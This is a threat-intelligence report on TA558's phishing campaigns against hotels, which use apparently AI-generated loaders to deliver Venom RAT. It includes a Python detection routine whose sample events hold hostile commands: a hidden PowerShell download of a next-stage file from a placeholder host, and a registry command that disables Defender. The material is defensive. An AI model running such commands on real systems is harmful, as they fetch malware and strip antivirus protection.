The cybercriminal group known as TA558 has recently intensified its operations, targeting the hospitality sector in Brazil and Spanish-speaking regions. Utilizing advanced techniques, including artificial intelligence (AI)-generated scripts, the group has been deploying remote access trojans (RATs) like Venom RAT to infiltrate hotel systems.
Background on TA558
Active since at least 2015, TA558 has a history of targeting hospitality, hotel, and travel organizations, primarily in Latin America. Their primary objective is to install malware on compromised systems to steal sensitive information, particularly credit card data from guests and travelers. This data is often obtained from hotel systems and popular online travel agencies (OTAs) such as Booking.com.
Evolution of Attack Methods
Initially, TA558’s campaigns involved phishing emails with malicious attachments like Word, Excel, or PDF documents. These attachments exploited known vulnerabilities in Microsoft Office, such as CVE-2017-0199, to deploy various RATs, including Revenge RAT, NjRAT, NanoCoreRAT, and 888 RAT. Over time, the group refined its tactics, incorporating a broader range of malware like Agent Tesla, AsyncRAT, FormBook, GuLoader, Loda RAT, LokiBot, Remcos RAT, Snake Keylogger, and Vjw0rm.
Current Campaigns and AI Integration
In their latest campaigns, observed in the summer of 2025, TA558 has been sending phishing emails written in Portuguese and Spanish. These emails, often disguised as hotel reservations or job applications, trick recipients into clicking on malicious links. This action downloads a WScript JavaScript payload, which appears to be generated by large language model (LLM) agents. The script’s heavily commented code and format are indicative of AI generation.
The primary function of this AI-generated script is to load the subsequent scripts that carry the infection forward, including a PowerShell script that retrieves a downloader named cargajecerrr.txt from an external server. This downloader then fetches two additional payloads, among them a loader responsible for launching the Venom RAT malware.
Venom RAT: Capabilities and Deployment
Venom RAT, based on the open-source Quasar RAT, is a commercial tool sold for $650 as a lifetime license; a one-month subscription, which includes the HVNC and Stealer components, costs $350. The malware is designed to siphon data, act as a reverse proxy, and protect itself with an anti-kill mechanism that keeps it running uninterrupted.
To achieve this, Venom RAT modifies the Discretionary Access Control List (DACL) of its own running process, removing any permissions that could be used to interfere with it. It also terminates any running process whose name matches a hard-coded list.
Additionally, the malware establishes persistence on the host by modifying Windows Registry entries and re-launching itself whenever its process is not found in the list of running processes. If executed with elevated privileges, Venom RAT enables SeDebugPrivilege in its access token and marks itself as a critical system process, allowing it to persist even when termination is attempted. It also prevents the computer from entering sleep mode by keeping the display on.
Furthermore, Venom RAT can spread via removable USB drives and terminate processes associated with Microsoft Defender Antivirus. It can also tamper with the task scheduler and Registry to disable security programs.
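As an added illustration (not code from the article or from any vendor's detection content), the following Python triage routine looks for the infection chain and Venom RAT behaviours described above in Sysmon-style process-creation and registry events; the event records are constructed, and the field names, paths, SIDs and registry value names are assumptions.

```python
import re

# The chain the article describes: wscript.exe runs the downloaded .js stage,
# which launches powershell.exe to fetch the next stage (Sysmon EventID 1,
# process creation). Image names are matched at the end of the path.
SCRIPT_CHAIN = (r"\\wscript\.exe$", r"\\powershell\.exe$")
# Run-key persistence (Sysmon EventID 13, registry value set) is only flagged
# when the value points into a user-writable location.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads)\\", re.IGNORECASE)
# Registry / task-scheduler tampering aimed at Defender; noisy on admin
# activity, so tune the task-name part for your estate.
SECURITY_TAMPER = re.compile(
    r"DisableAntiSpyware|DisableRealtimeMonitoring|schtasks(\.exe)?\s+/(change|delete)\b",
    re.IGNORECASE)


def triage(events):
    """Return (rule, evidence) tuples for events matching the described behaviours."""
    hits = []
    for e in events:
        if e["EventID"] == 1:  # process creation
            parent_re, child_re = SCRIPT_CHAIN
            if re.search(parent_re, e.get("ParentImage", ""), re.I) and re.search(child_re, e["Image"], re.I):
                hits.append(("script_host_chain", e["Image"]))
            if SECURITY_TAMPER.search(e.get("CommandLine", "")):
                hits.append(("security_tamper", e["CommandLine"]))
        elif e["EventID"] == 13 and RUN_KEY.search(e["TargetObject"]):  # registry value set
            if USER_WRITABLE.search(e.get("Details", "")):
                hits.append(("run_key_persistence", e["TargetObject"]))
    return hits


# Constructed sample events, not real telemetry; paths, SIDs and value names are assumptions.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": r'wscript.exe "C:\Users\guest\Downloads\reserva.js"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -w hidden -c iwr http://server.invalid/cargajecerrr.txt"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\guest\AppData\Roaming\Updater\svc.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Users\guest\AppData\Roaming\Updater\svc.exe",
     "CommandLine": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"},  # benign entry, not flagged
]
```

Calling `triage(SAMPLE_EVENTS)` yields three hits; the last sample, a Run entry under Program Files, is deliberately left unflagged to show that the persistence rule keys on the user-writable path rather than on the Run key alone.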
Implications and Recommendations
The integration of AI-generated scripts into TA558’s attack vectors signifies a concerning evolution in cybercriminal tactics. By leveraging AI, these actors can automate and enhance their phishing campaigns, making them more convincing and harder to detect.
Organizations, especially those in the hospitality sector, should be aware of these advanced threats and take proactive measures to protect their systems. This includes:
– Employee Training: Educate staff about the latest phishing tactics and the importance of scrutinizing unsolicited emails, especially those containing links or attachments.
– Advanced Email Filtering: Implement email security solutions that can detect and block phishing attempts, even those using AI-generated content.
– Regular System Updates: Ensure that all software and systems are up-to-date with the latest security patches to mitigate vulnerabilities that could be exploited by malware.
– Network Monitoring: Deploy network monitoring tools to detect unusual activities that may indicate a breach or malware infection.
By staying informed about the evolving tactics of groups like TA558 and implementing robust cybersecurity measures, organizations can better defend against these sophisticated threats.